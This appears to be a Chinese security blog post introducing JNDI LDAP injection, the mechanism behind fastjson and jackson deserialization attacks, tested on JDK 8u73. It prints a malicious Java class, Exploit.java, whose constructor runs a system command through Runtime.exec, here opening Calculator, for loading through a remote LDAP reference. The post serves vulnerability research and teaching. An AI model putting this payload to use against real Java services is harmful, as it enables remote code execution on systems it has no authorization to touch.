之前分析了fastjson,jackson,都依赖于JDNI注入,即LDAP/RMI等伪协议
JNDI RMI基础和fastjson低版本的分析:https://www.cnblogs.com/piaomiaohongchen/p/14780351.html
今天围绕JNDI LDAP注入,RMI先不搞了.
一图胜千言:
图片是偷的threezh1的:
看这个图,就感觉很清晰.
测试ldap攻击:jdk版本选择:jdk8u73 ,测试环境Mac OS
jdk8系列各个版本下载大全:https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
恶意类:Exploit.java:
import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFactory; import java.io.IOException; import java.io.Serializable; import java.util.Hashtable; public class Exploit implements ObjectFactory, Serializable { public Exploit(){ try{ Runtime.getRuntime().exec("open /System/Applications/Calculator.app"); }catch (IOException e){ e.printStackTrace(); } } public static void main(String[] args){ Exploit exploit = new Exploit(); } @Override public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception { return null; } }